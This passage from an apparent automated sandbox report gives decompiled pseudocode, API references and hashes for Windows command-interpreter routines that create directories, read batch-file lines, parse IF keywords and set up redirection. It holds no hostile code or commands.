						__imp__??_V@YAXPAX@Z(_v28);
						_t61 = _t105;
						L10:
						return E00346FD0(_t61, _t86, _v8 ^ _t107, _t100, _t104, _t105);
					}
					_t63 = _v28;
					if(_t63 == 0) {
						_t63 =  &_v548;
					}
					_t91 =  &_v552;
					_t64 = GetFullPathNameW(_t104, _v20, _t63,  &_v552);
					if(_t64 == 0) {
						_t59 = GetLastError();
						goto L39;
					} else {
						if(_t64 >= 0x7fe7) {
							_push(_t104);
							_push(_t86);
							_push(0x400023d9);
							L43:
							E0033C5A2(_t91);
							goto L8;
						}
						if(CreateDirectoryW(_t104, _t105) == 0) {
							_t59 = GetLastError();
							if(_t59 == 0xb7) {
								_push(_t104);
								_push(_t86);
								_push(0x235c);
								goto L43;
							}
							if(_t59 != 3) {
								goto L39;
							}
							if( *0x373cc9 == 0) {
								L29:
								_push(_t105);
								_push(0x52);
								goto L40;
							}
							_t91 = _v28;
							_t67 = _t91;
							if(_t91 == 0) {
								_t67 =  &_v548;
							}
							_t100 = 0x5c;
							_t104 = 0x3a;
							_v560 = _t100;
							if(_t67[1] != _t104) {
								_t68 = _t91;
								if(_t91 == 0) {
									_t68 =  &_v548;
								}
								if( *_t68 != _t100) {
									goto L29;
								} else {
									_t69 = _t91;
									if(_t91 == 0) {
										_t69 =  &_v548;
									}
									if(_t69[1] != _t100) {
										goto L29;
									} else {
										_t101 = _t91;
										if(_t91 == 0) {
											_t101 =  &_v548;
										}
										_t100 =  &(_t101[2]);
										_v552 = _t100;
										_t104 = _t100;
										_t70 =  *_t100 & 0x0000ffff;
										if(_t70 == 0) {
											L59:
											if( *_t100 != _t105) {
												_t100 =  &(_t104[1]);
												_v552 = _t100;
												_t104 = _t100;
											}
											_t71 =  *_t100 & 0x0000ffff;
											if(_t71 == 0) {
												goto L30;
											}
											_v556 = _t71;
											_t88 = _t71;
											while(1) {
												_t73 = _t104;
												if(_t88 == _v560) {
													break;
												}
												_t100 =  &(_t104[1]);
												_v552 = _t100;
												_t104 = _t100;
												_t81 =  *_t100 & 0x0000ffff;
												_v556 = _t100;
												_t88 = _t81;
												if(_t81 != 0) {
													continue;
												}
												_t73 = _t100;
												break;
											}
											_t86 = 1;
											if( *_t100 == _t105) {
												goto L30;
											}
											_t100 =  &(_t73[1]);
											goto L19;
										}
										_t89 = _t100;
										_t97 = _t70;
										_t106 = 0x5c;
										while(1) {
											_t104 = _t89;
											if(_t97 == _t106) {
												break;
											}
											_t100 =  &(_t89[1]);
											_v552 = _t100;
											_t89 = _t100;
											_t82 =  *_t100 & 0x0000ffff;
											_t104 = _t100;
											_t97 = _t82;
											if(_t82 != 0) {
												continue;
											}
											break;
										}
										_t91 = _v28;
										_t86 = 1;
										_t105 = 0;
										goto L59;
									}
								}
							} else {
								_t103 = _t91;
								if(_t91 == 0) {
									_t103 =  &_v548;
								}
								_t100 =  &(_t103[3]);
								while(1) {
									L19:
									_v552 = _t100;
									while(1) {
										L20:
										_t104 =  *_t100 & 0x0000ffff;
										if(_t104 == 0) {
											break;
										} else {
											goto L21;
										}
										while(1) {
											L21:
											_t74 = 0x5c;
											if(_t104 == _t74) {
												break;
											}
											_t100 =  &(_t100[1]);
											_v552 = _t100;
											_t80 =  *_t100 & 0x0000ffff;
											_t104 = _t80;
											if(_t80 != 0) {
												continue;
											}
											_t104 = 0x5c;
											if( *_t100 != _t104) {
												goto L20;
											}
											L26:
											 *_t100 = 0;
											_t76 = _v28;
											if(_t76 == 0) {
												_t76 =  &_v548;
											}
											if(CreateDirectoryW(_t76, _t105) != 0 || GetLastError() == 0xb7) {
												 *_v552 = _t104;
												_t91 = _v28;
												_t100 =  &(_v552[1]);
												goto L19;
											} else {
												goto L29;
											}
										}
										_t104 = 0x5c;
										goto L26;
									}
									L30:
									if(_t91 == 0) {
										_t91 =  &_v548;
									}
									if(CreateDirectoryW(_t91, _t105) != 0) {
										goto L9;
									} else {
										_t59 = GetLastError();
										if(_t59 == 0xb7) {
											goto L9;
										} else {
											goto L39;
										}
									}
								}
							}
						}
						_t86 = _t105;
						goto L8;
					}
				}
				_t98 =  *_t104;
				if(E003429BB( *_t104) == 0) {
					_push(0);
					_push(0xf);
					E0033C5A2(_t98);
					_t61 = 1;
					goto L10;
				}
				goto L2;
			}

0x0033bf30
0x0033bf3b
0x0033bf42
0x0033bf48
0x0033bf4d
0x0033bf52
0x0033bf64
0x0033bf69
0x0033bf6c
0x0033bf77
0x0033bf7b
0x0033bf7d
0x0033bf80
0x0033bf87
0x0033bfa9
0x0034a3d6
0x0034a3ea
0x0034a3ea
0x0034a3eb
0x0034a3ec
0x0034a3ec
0x0033bfed
0x0033bfed
0x0033bfef
0x0033bff2
0x0033bff8
0x0033bffa
0x0033c00b
0x0033c00b
0x0033bfaf
0x0033bfb4
0x0034a3d9
0x0034a3d9
0x0033bfba
0x0033bfc6
0x0033bfce
0x0034a3e4
0x00000000
0x0033bfd4
0x0033bfd9
0x0034a3f8
0x0034a3f9
0x0034a3fa
0x0034a408
0x0034a408
0x00000000
0x0034a40d
0x0033bfe9
0x0033c00e
0x0033c019
0x0034a401
0x0034a402
0x0034a403
0x00000000
0x0034a403
0x0033c022
0x00000000
0x00000000
0x0033c02f
0x0033c0d7
0x0033c0d7
0x0033c0d8
0x00000000
0x0033c0d8
0x0033c035
0x0033c038
0x0033c03c
0x0034a415
0x0034a415
0x0033c044
0x0033c047
0x0033c048
0x0033c052
0x0034a42b
0x0034a42f
0x0034a431
0x0034a431
0x0034a43a
0x00000000
0x0034a440
0x0034a440
0x0034a444
0x0034a446
0x0034a446
0x0034a450
0x00000000
0x0034a456
0x0034a456
0x0034a45a
0x0034a45c
0x0034a45c
0x0034a462
0x0034a465
0x0034a46b
0x0034a46d
0x0034a473
0x0034a4a2
0x0034a4a5
0x0034a4a7
0x0034a4aa
0x0034a4b0
0x0034a4b0
0x0034a4b2
0x0034a4b8
0x00000000
0x00000000
0x0034a4be
0x0034a4c4
0x0034a4c6
0x0034a4c6
0x0034a4cf
0x00000000
0x00000000
0x0034a4d1
0x0034a4d4
0x0034a4da
0x0034a4dc
0x0034a4df
0x0034a4e5
0x0034a4ea
0x00000000
0x00000000
0x0034a4ec
0x00000000
0x0034a4ec
0x0034a4f0
0x0034a4f4
0x00000000
0x00000000
0x0034a4fa
0x00000000
0x0034a4fa
0x0034a477
0x0034a479
0x0034a47b
0x0034a47c
0x0034a47c
0x0034a481
0x00000000
0x00000000
0x0034a483
0x0034a486
0x0034a48c
0x0034a48e
0x0034a491
0x0034a493
0x0034a498
0x00000000
0x00000000
0x00000000
0x0034a498
0x0034a49a
0x0034a49f
0x0034a4a0
0x00000000
0x0034a4a0
0x0034a450
0x0033c058
0x0033c058
0x0033c05c
0x0034a420
0x0034a420
0x0033c062
0x0033c07c
0x0033c07c
0x0033c07c
0x0033c082
0x0033c082
0x0033c082
0x0033c088
0x00000000
0x00000000
0x00000000
0x00000000
0x0033c08a
0x0033c08a
0x0033c08c
0x0033c090
0x00000000
0x00000000
0x0033c092
0x0033c095
0x0033c09b
0x0033c09e
0x0033c0a3
0x00000000
0x00000000
0x0033c0a7
0x0033c0ab
0x00000000
0x00000000
0x0033c0b2
0x0033c0b4
0x0033c0b7
0x0033c0bc
0x0033c0f8
0x0033c0f8
0x0033c0c8
0x0033c06d
0x0033c076
0x0033c079
0x00000000
0x00000000
0x00000000
0x00000000
0x0033c0c8
0x0033c0b1
0x00000000
0x0033c0b1
0x0033c0df
0x0033c0e1
0x0033c100
0x0033c100
0x0033c0ed
0x00000000
0x0033c0f3
0x0034a502
0x0034a50d
0x00000000
0x0034a513
0x00000000
0x0034a513
0x0034a50d
0x0033c0ed
0x0033c07c
0x0033c052
0x0033bfeb
0x00000000
0x0033bfeb
0x0033bfce
0x0033bf54
0x0033bf5e
0x0034a3c2
0x0034a3c4
0x0034a3c6
0x0034a3ce
0x00000000
0x0034a3ce
0x00000000

APIs

memset.MSVCRT ref: 0033BF80
GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,?,-00000105), ref: 0033BFC6
CreateDirectoryW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000000), ref: 0033BFE1
??_V@YAXPAX@Z.MSVCRT ref: 0033BFF2

Part of subcall function 003429BB: GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0(00340B22,00340B22,00007FE7), ref: 003429E9

GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 0033C00E
CreateDirectoryW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000000), ref: 0033C0C0
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 0033C0CA
CreateDirectoryW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000000), ref: 0033C0E5
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 0034A502

Memory Dump Source

Source File: 0000001A.00000002.467560189.0000000000330000.00000040.00000001.sdmp, Offset: 00330000, based on PE: true

Associated: 0000001A.00000002.468665069.0000000000379000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.468797072.000000000037D000.00000040.00000001.sdmp Download File

Similarity

API ID: CreateDirectoryErrorLast$DriveFullNamePathTypememset
String ID:
API String ID: 402963468-0
Opcode ID: d8b0872a84c25edd21f8258ce0e83786f6bfd878dbefe904a957e31942ecd405
Instruction ID: 6a6f753a896b516983896264f6570858cf111a12026d115d7c959ab8c87a7e08
Opcode Fuzzy Hash: d8b0872a84c25edd21f8258ce0e83786f6bfd878dbefe904a957e31942ecd405
Instruction Fuzzy Hash: DA811631A40616DADB3ADF55DC88BBAB7F8EF48300F0580A5E509EB290E770ED80CB51

Uniqueness

Uniqueness Score: -1.00%

Function 0035396E, Relevance: 15.2, APIs: 10, Instructions: 153
fileCOMMON

Download Yara Rule

C-Code - Quality: 45%

			E0035396E(void* __ecx, short* __edx, long _a4, DWORD* _a8) {
				long _v8;
				char* _v12;
				long _v16;
				void* _v20;
				int _v24;
				short* _v28;
				int _t36;
				signed int _t38;
				int _t41;
				int _t52;
				void* _t54;
				char* _t55;
				int _t57;
				int _t58;
				void _t60;
				int _t62;
				void* _t65;
				DWORD* _t67;

				_t65 = __ecx;
				_v28 = __edx;
				_v20 = __ecx;
				_t54 = 0x35d620;
				_v16 = SetFilePointer(__ecx, 0, 0, 1);
				if(_a4 >= 0x1fff) {
					_a4 = 0x1fff;
				}
				__imp__AcquireSRWLockShared(0x377f20);
				_t36 = ReadFile(_t65, _t54, _a4, _a8, 0);
				__imp__ReleaseSRWLockShared(0x377f20);
				if(_t36 != 0) {
					_t67 = _a8;
					_t62 =  *_t67;
					if(_t62 == 0) {
						goto L3;
					}
					_t57 = _t62;
					_v8 = _t62;
					if( *0x363854 == 0xfde9 && _v16 == 0 && _a4 > 3) {
						_push(3);
						_push(0x333270);
						_push(_t54);
						L003482C7();
						_t57 = _t62;
						if(_t36 == 0) {
							_t62 = _t62 + 0xfffffffd;
							_v16 = 3;
							_t54 = 0x35d623;
							 *_t67 = _t62;
							_v8 = _t62;
							_t57 = _t62;
						}
					}
					_v12 = _t54;
					if(_t62 <= 0) {
						L21:
						_t55 = _v12;
						goto L22;
					} else {
						do {
							if(_t57 < 3) {
								L16:
								if( *((char*)(( *_t54 & 0x000000ff) + 0x377f30)) == 0) {
									_t57 = _t57 - 1;
									goto L20;
								}
								if(_t57 == 1) {
									__imp__AcquireSRWLockShared(0x377f20);
									_t28 = _t54 + 1; // 0x35d621
									_t52 = ReadFile(_v20, _t28, 1,  &_v8, 0);
									__imp__ReleaseSRWLockShared(0x377f20);
									if(_t52 == 0 || _v8 == 0) {
										 *_a8 =  *_a8 & 0x00000000;
										goto L3;
									} else {
										_t67 = _a8;
										_t62 = _t62 + 1;
										goto L21;
									}
								}
								_push(2);
								_t57 = _t57 + 0xfffffffe;
								_pop(1);
								goto L20;
							}
							_t60 =  *_t54;
							if(_t60 != 0xa ||  *(_t54 + 1) != 0xd) {
								_v24 = _t57;
								if(_t60 != 0xd ||  *(_t54 + 1) != 0xa) {
									goto L16;
								} else {
									goto L24;
								}
							} else {
								L24:
								 *((char*)(_t54 + 2)) = 0;
								_t55 = _v12;
								_t62 = _t54 - _t55 + 2;
								SetFilePointer(_v20, _v16 + _t62, 0, 0);
								L22:
								_t58 =  *0x363854;
								_t38 = E00340638(_t58);
								asm("sbb eax, eax");
								_t41 = MultiByteToWideChar(_t58,  ~( ~_t38), _t55, _t62, _v28, _a4);
								 *_t67 = _t41;
								return _t41;
							}
							L20:
							_t54 = _t54 + 1;
							_v8 = _t57;
						} while (_t57 > 0);
						goto L21;
					}
				} else {
					L3:
					return 0;
				}
			}

0x0035397d
0x0035397f
0x00353985
0x00353988
0x00353993
0x0035399e
0x003539a0
0x003539a0
0x003539a9
0x003539ba
0x003539c3
0x003539cb
0x003539d4
0x003539d7
0x003539db
0x00000000
0x00000000
0x003539e7
0x003539e9
0x003539ec
0x003539fa
0x003539fc
0x00353a01
0x00353a02
0x00353a0a
0x00353a0e
0x00353a10
0x00353a13
0x00353a1a
0x00353a1f
0x00353a21
0x00353a24
0x00353a24
0x00353a0e
0x00353a26
0x00353a2b
0x00353a75
0x00353a75
0x00000000
0x00353a2d
0x00353a2d
0x00353a30
0x00353a4f
0x00353a59
0x00353a6a
0x00000000
0x00353a6b
0x00353a5e
0x00353acb
0x00353ad9
0x00353ae0
0x00353aed
0x00353af5
0x00353b09
0x00000000
0x00353afd
0x00353afd
0x00353b00
0x00000000
0x00353b00
0x00353af5
0x00353a60
0x00353a62
0x00353a65
0x00000000
0x00353a65
0x00353a32
0x00353a37
0x00353a3f
0x00353a47
0x00000000
0x00000000
0x00000000
0x00000000
0x00353aa4
0x00353aa4
0x00353aa9
0x00353aac
0x00353ab5
0x00353abe
0x00353a78
0x00353a78
0x00353a7e
0x00353a8b
0x00353a93
0x00353a99
0x00000000
0x00353a99
0x00353a6c
0x00353a6c
0x00353a6e
0x00353a71
0x00000000
0x00353a2d
0x003539cd
0x003539cd
0x00000000
0x003539cd

APIs

SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000000,00000000,00000001,0000000A,00000000,00000001,?,00353B43,?,?,?,0035977C), ref: 0035398D
AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00377F20,?,00353B43,?,?,?,0035977C), ref: 003539A9
ReadFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000,0035D620,?,?,00000000,?,00353B43,?,?,?,0035977C), ref: 003539BA
ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00377F20,?,00353B43,?,?,?,0035977C), ref: 003539C3
memcmp.MSVCRT ref: 00353A02
MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0(?,00000000,?,00377F20,?,?,?,00353B43,?,?,?,0035977C), ref: 00353A93
SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000000,00000000,?,00353B43,?,?,?,0035977C), ref: 00353ABE
AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00377F20,?,00353B43,?,?,?,0035977C), ref: 00353ACB
ReadFile.API-MS-WIN-CORE-FILE-L1-1-0(?,0035D621,00000001,0035977C,00000000,?,00353B43,?,?,?,0035977C), ref: 00353AE0
ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00377F20,?,00353B43,?,?,?,0035977C), ref: 00353AED

Memory Dump Source

Source File: 0000001A.00000002.467560189.0000000000330000.00000040.00000001.sdmp, Offset: 00330000, based on PE: true

Associated: 0000001A.00000002.468665069.0000000000379000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.468797072.000000000037D000.00000040.00000001.sdmp Download File

Similarity

API ID: FileLockShared$AcquirePointerReadRelease$ByteCharMultiWidememcmp
String ID:
API String ID: 2002953238-0
Opcode ID: 78af8829fc3914f68b6bba939d56df3244fd697ec5e53e2de1353172802e3a0b
Instruction ID: 572f26458f9e6ad0b68044f1a24be083d2973160a1fbc7fd12eb6e0aaffb2fd4
Opcode Fuzzy Hash: 78af8829fc3914f68b6bba939d56df3244fd697ec5e53e2de1353172802e3a0b
Instruction Fuzzy Hash: 40517272A04244AFDB228F68CC85FA97BB9EB84352F15415AFD459B2A1C7748E44CB50

Uniqueness

Uniqueness Score: -1.00%

Function 0033CDA2, Relevance: 15.1, APIs: 5, Strings: 5, Instructions: 97
COMMON

Download Yara Rule

C-Code - Quality: 32%

			E0033CDA2(void* __ecx) {
				void* __ebp;
				void* _t2;
				signed int _t4;
				intOrPtr _t6;
				void* _t18;
				void* _t23;
				void* _t33;
				intOrPtr* _t36;

				_push(__ecx);
				_t33 = __ecx;
				_t2 = E0033F030(0);
				_t40 = _t2 - 0x4000;
				if(_t2 != 0x4000) {
					E003582EB(0);
				}
				_t4 = E0033E9A0(0, _t40);
				_t36 = _t4;
				__imp___wcsicmp(L"ERRORLEVEL", 0x36faa0);
				_pop(_t18);
				if(_t4 == 0) {
					 *_t36 = 0x35;
					goto L14;
				} else {
					__imp___wcsicmp(L"EXIST", 0x36faa0);
					_pop(_t18);
					if(_t4 == 0) {
						 *_t36 = 0x37;
						L14:
						_t6 = E0033EA40(E0033DDCD(_t18, _t18, 0), 0);
						L12:
						 *((intOrPtr*)(_t36 + 0x3c)) = _t6;
						L9:
						return _t36;
					}
					if( *0x373cc9 == 0) {
						L7:
						__imp___wcsicmp(L"NOT", 0x36faa0);
						_pop(_t23);
						if(_t4 == 0) {
							__eflags = _t33;
							if(_t33 != 0) {
								E003582EB(_t23);
							}
							 *_t36 = 0x38;
							__eflags = 1;
							_t6 = E0033CDA2(1);
							goto L12;
						}
						E0033F300(_t4, 0, 0, 0);
						 *_t36 = 0x39;
						E00339520(_t36);
						goto L9;
					}
					__imp___wcsicmp(L"CMDEXTVERSION", 0x36faa0);
					_pop(_t18);
					if(_t4 == 0) {
						 *_t36 = 0x34;
						goto L14;
					}
					if( *0x373cc9 == 0) {
						goto L7;
					}
					__imp___wcsicmp(L"DEFINED", 0x36faa0);
					_pop(_t18);
					if(_t4 == 0) {
						 *_t36 = 0x36;
						goto L14;
					}
					goto L7;
				}
			}

0x0033cdaa
0x0033cdae
0x0033cdb2
0x0033cdb7
0x0033cdbc
0x0034b3f9
0x0034b3f9
0x0033cdc4
0x0033cdce
0x0033cdd6
0x0033cddd
0x0033cde0
0x0034b403
0x00000000
0x0033cde6
0x0033cdec
0x0033cdf3
0x0033cdf6
0x0033ce9a
0x0033ce86
0x0033ce93
0x0033ce7b
0x0033ce7b
0x0033ce60
0x0033ce68
0x0033ce68
0x0033ce03
0x0033ce36
0x0033ce3c
0x0033ce43
0x0033ce46
0x0033ce69
0x0033ce6b
0x0033cea2
0x0033cea2
0x0033ce6f
0x0033ce75
0x0033ce76
0x00000000
0x0033ce76
0x0033ce4e
0x0033ce55
0x0033ce5b
0x00000000
0x0033ce5b
0x0033ce0b
0x0033ce12
0x0033ce15
0x0034b40e
0x00000000
0x0034b40e
0x0033ce22
0x00000000
0x00000000
0x0033ce2a
0x0033ce31
0x0033ce34
0x0033ce80
0x00000000
0x0033ce80
0x00000000
0x0033ce34

APIs

_wcsicmp.MSVCRT ref: 0033CDD6
_wcsicmp.MSVCRT ref: 0033CDEC
_wcsicmp.MSVCRT ref: 0033CE0B
_wcsicmp.MSVCRT ref: 0033CE2A
_wcsicmp.MSVCRT ref: 0033CE3C

Strings

CMDEXTVERSION, xrefs: 0033CE06
NOT, xrefs: 0033CE37
EXIST, xrefs: 0033CDE7
DEFINED, xrefs: 0033CE25
ERRORLEVEL, xrefs: 0033CDD1

Memory Dump Source

Source File: 0000001A.00000002.467560189.0000000000330000.00000040.00000001.sdmp, Offset: 00330000, based on PE: true

Associated: 0000001A.00000002.468665069.0000000000379000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.468797072.000000000037D000.00000040.00000001.sdmp Download File

Similarity

API ID: _wcsicmp
String ID: CMDEXTVERSION$DEFINED$ERRORLEVEL$EXIST$NOT
API String ID: 2081463915-1668778490
Opcode ID: 180557e76fe78e7227f9c8d175337c52954c9bb4836327001c7fd19bcd6c63f4
Instruction ID: dd8d34c5978fb82e725dc2365b3a3a56d0df965c971acac8d5e3581d73be3bc4
Opcode Fuzzy Hash: 180557e76fe78e7227f9c8d175337c52954c9bb4836327001c7fd19bcd6c63f4
Instruction Fuzzy Hash: CD21F3752143029AF73B1B35ACC6727B6CDEB447A2F20541FF086A51D1EF759840C755

Uniqueness

Uniqueness Score: -1.00%

Function 0033D97E, Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 268
COMMON

Download Yara Rule

C-Code - Quality: 69%

			E0033D97E(signed int* __ecx, signed int __edx) {
				signed int _v8;
				long _v20;
				char _v24;
				int _v28;
				void _v548;
				signed int _v552;
				signed int* _v556;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t56;
				signed int* _t68;
				signed int _t75;
				signed int _t76;
				WCHAR* _t80;
				WCHAR* _t83;
				void* _t89;
				void* _t90;
				signed int _t92;
				void* _t93;
				WCHAR* _t95;
				WCHAR* _t103;
				WCHAR* _t110;
				void* _t116;
				signed int _t120;
				signed int _t123;
				void* _t128;
				signed int _t129;
				signed int _t130;
				void* _t133;
				signed int _t135;
				signed int _t136;
				signed int _t137;

				_t124 = __edx;
				_t56 =  *0x35d0b4; // 0xd59bd0e8
				_v8 = _t56 ^ _t137;
				_t134 = 0x104;
				_v552 = __edx;
				_t95 = 0;
				_v24 = 1;
				_v28 = 0;
				_t129 = __ecx;
				_v20 = 0x104;
				_v556 = __ecx;
				memset( &_v548, 0, 0x104);
				if(E00340C70( &_v548, ((0 | _v24 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) < 0) {
					L33:
					_t95 = 1;
					L30:
					__imp__??_V@YAXPAX@Z();
					return E00346FD0(_t95, _t95, _v8 ^ _t137, _t124, _t129, _t134, _v28);
				}
				_t135 =  *(_t129 + 0x34);
				if(_t135 == 0) {
					L11:
					_t134 = _v552;
					if(_t134 == 3) {
						_t68 =  *0x373cd4;
						_v556 = _t68;
						L14:
						_t129 =  *(_t129 + 0x34);
						if(_t129 == 0) {
							goto L30;
						}
						_t134 = _t134 | 0xffffffff;
						do {
							if( *(_t129 + 8) != _t95) {
								goto L29;
							}
							__imp___get_osfhandle( *_t129);
							if(_t68 == _t134) {
								L39:
								 *(_t129 + 8) = _t134;
								L22:
								_t103 =  *(_t129 + 4);
								if( *_t103 == 0x26) {
									_t103[2] = 0;
									_t124 =  *_t129;
									_t105 = (( *(_t129 + 4))[1] & 0x0000ffff) - 0x30;
									if(E0033DBFC((( *(_t129 + 4))[1] & 0x0000ffff) - 0x30,  *_t129) != _t134) {
										goto L29;
									}
									L52:
									E0033D937();
									_t134 = 0x373d00;
									E0034274C(0x373d00, 0x104, L"%d",  *_t129);
									E0033C5A2(_t105, 0x2344, 1, 0x373d00);
									goto L33;
								}
								_push(_t103);
								if( *((short*)(_t129 + 0x10)) == 0x3c) {
									_t124 = 0x8000;
									_t75 = E0033D120(_t103, 0x8000);
									_v552 = _t75;
									if(_t75 != _t134) {
										L26:
										if(_t75 !=  *_t129) {
											_t124 =  *_t129;
											_t76 = E0033DBFC(_t75,  *_t129);
											_t105 = _v552;
											_t136 = _t76;
											E0033DB92(_v552);
											if(_t136 == 0xffffffff) {
												goto L52;
											}
											_t75 =  *_t129;
											_t134 = _t136 | 0xffffffff;
										}
										if(_t75 == _t134) {
											L53:
											E0033D937();
											E0035985A( *0x373cf0);
											goto L33;
										}
										_v556[1] = _t75;
										goto L29;
									}
									_t80 = E00343320(L"DPATH");
									if(_t80 == 0) {
										goto L53;
									}
									_t110 = _v28;
									if(_t110 == 0) {
										_t110 =  &_v548;
									}
									if(SearchPathW(_t80,  *(_t129 + 4), _t95, _v20, _t110, _t95) == 0) {
										goto L53;
									} else {
										_t103 = _v28;
										if(_t103 == 0) {
											_t103 =  &_v548;
										}
										_push(_t103);
										_t124 = 0x8000;
										L25:
										_t75 = E0033D120(_t103, _t124);
										_v552 = _t75;
										if(_t75 == _t134) {
											goto L53;
										}
										goto L26;
									}
								}
								asm("sbb edx, edx");
								_t124 = ( ~( *(_t129 + 0xc)) & 0xfffffe09) + 0x301;
								goto L25;
							}
							__imp___get_osfhandle( *_t129);
							if(_t68 == 0xfffffffe) {
								goto L39;
							}
							if(E00340178(_t68) == 0) {
								_t82 = E00359953(_t82,  *_t129);
								if(_t82 != 0) {
									goto L20;
								}
								__imp___get_osfhandle( *_t129, _t95, _t95, 1);
								_pop(_t114);
								if(_t82 != _t134) {
									goto L20;
								}
								_t134 = 0x373d00;
								E0034274C(0x373d00, 0x104, L"%d",  *_t129);
								_push(0x373d00);
								_push(1);
								_push(0x40002721);
								L51:
								E0033C5A2(_t114);
								 *(_t129 + 8) = _t95;
								E0033D937();
								goto L33;
							}
							L20:
							_t114 =  *_t129;
							_t83 = E0033DBCE(_t82,  *_t129);
							 *(_t129 + 8) = _t83;
							if(_t83 == _t134) {
								_t134 = 0x373d00;
								E0034274C(0x373d00, 0x104, L"%d",  *_t129);
								_push(0x373d00);
								_push(1);
								_push(0x2344);
								goto L51;
							}
							E0033DB92( *_t129);
							goto L22;
							L29:
							_t68 =  *(_t129 + 0x14);
							_t129 = _t68;
						} while (_t68 != 0);
						goto L30;
					}
					_t116 = 0x10;
					_t68 = E003400B0(_t116);
					_v556 = _t68;
					if(_t68 == 0) {
						goto L33;
					}
					_t68[3] =  *0x373cd4;
					 *0x373cd4 = _t68;
					_t68[2] = _t129;
					 *_t68 = _t134;
					goto L14;
				} else {
					goto L2;
				}
				do {
					L2:
					_t118 =  *(_t135 + 4);
					_t130 =  *(_t135 + 4);
					_t128 = _t130 + 2;
					do {
						_t89 =  *_t130;
						_t130 = _t130 + 2;
					} while (_t89 != _t95);
					_t90 = E003422C0(_t95, _t118);
					_t124 = (_t130 - _t128 >> 1) + 1;
					E00341040( *(_t135 + 4), (_t130 - _t128 >> 1) + 1, _t90);
					if( *((intOrPtr*)(_t135 + 8)) != _t95) {
						goto L9;
					}
					_t124 =  *(_t135 + 4);
					_t120 = _t124;
					_t133 = _t120 + 2;
					do {
						_t93 =  *_t120;
						_t120 = _t120 + 2;
					} while (_t93 != _t95);
					_t123 = (_t120 - _t133 >> 1) - 1;
					if(_t123 > 1 &&  *((short*)(_t124 + _t123 * 2)) == 0x3a) {
						 *((short*)(_t124 + _t123 * 2)) = 0;
					}
					L9:
					_t92 =  *(_t135 + 0x14);
					_t135 = _t92;
				} while (_t92 != 0);
				_t129 = _v556;
				goto L11;
			}

0x0033d97e
0x0033d989
0x0033d990
0x0033d996
0x0033d99b
0x0033d9a1
0x0033d9a3
0x0033d9ae
0x0033d9b1
0x0033d9b3
0x0033d9b8
0x0033d9be
0x0033d9e4
0x0033db8d
0x0033db8f
0x0033db50
0x0033db53
0x0033db6c
0x0033db6c
0x0033d9ea
0x0033d9ef
0x0033da55
0x0033da55
0x0033da5e
0x0034ba31
0x0034ba36
0x0033da8d
0x0033da8d
0x0033da92
0x00000000
0x00000000
0x0033da98
0x0033da9b
0x0033da9e
0x00000000
0x00000000
0x0033daa6
0x0033daaf
0x0034ba90
0x0034ba90
0x0033daef
0x0033daef
0x0033daf6
0x0033db6f
0x0033db76
0x0033db7c
0x0033db86
0x00000000
0x00000000
0x0034bb58
0x0034bb58
0x0034bb5f
0x0034bb6f
0x0034bb7c
0x00000000
0x0034bb81
0x0033dafd
0x0033dafe
0x0034ba98
0x0034ba9d
0x0034baa2
0x0034baaa
0x0033db2a
0x0033db2c
0x0034baff
0x0034bb03
0x0034bb08
0x0034bb0e
0x0034bb10
0x0034bb18
0x00000000
0x00000000
0x0034bb1a
0x0034bb1c
0x0034bb1c
0x0033db34
0x0034bb89
0x0034bb89
0x0034bb94
0x00000000
0x0034bb94
0x0033db40
0x00000000
0x0033db40
0x0034bab5
0x0034babc
0x00000000
0x00000000
0x0034bac2
0x0034bac7
0x0034bac9
0x0034bac9
0x0034bae1
0x00000000
0x0034bae7
0x0034bae7
0x0034baec
0x0034baee
0x0034baee
0x0034baf4
0x0034baf5
0x0033db17
0x0033db17
0x0033db1c
0x0033db24
0x00000000
0x00000000
0x00000000
0x0033db24
0x0034bae1
0x0033db09
0x0033db11
0x00000000
0x0033db11
0x0033dab7
0x0033dac1
0x00000000
0x00000000
0x0033dad0
0x0034ba43
0x0034ba4a
0x00000000
0x00000000
0x0034ba56
0x0034ba5c
0x0034ba66
0x00000000
0x00000000
0x0034ba6e
0x0034ba7e
0x0034ba83
0x0034ba84
0x0034ba86
0x0034bb43
0x0034bb43
0x0034bb4b
0x0034bb4e
0x00000000
0x0034bb4e
0x0033dad6
0x0033dad6
0x0033dad8
0x0033dadd
0x0033dae2
0x0034bb26
0x0034bb36
0x0034bb3b
0x0034bb3c
0x0034bb3e
0x00000000
0x0034bb3e
0x0033daea
0x00000000
0x0033db43
0x0033db43
0x0033db46
0x0033db48
0x00000000
0x0033da9b
0x0033da66
0x0033da67
0x0033da6c
0x0033da74
0x00000000
0x00000000
0x0033da80
0x0033da83
0x0033da88
0x0033da8b
0x00000000
0x00000000
0x00000000
0x00000000
0x0033d9f1
0x0033d9f1
0x0033d9f1
0x0033d9f4
0x0033d9f6
0x0033d9f9
0x0033d9f9
0x0033d9fc
0x0033d9ff
0x0033da08
0x0033da10
0x0033da14
0x0033da1c
0x00000000
0x00000000
0x0033da1e
0x0033da21
0x0033da23
0x0033da26
0x0033da26
0x0033da29
0x0033da2c
0x0033da35
0x0033da39
0x0034ba28
0x0034ba28
0x0033da46
0x0033da46
0x0033da49
0x0033da4b
0x0033da4f
0x00000000

APIs

memset.MSVCRT ref: 0033D9BE
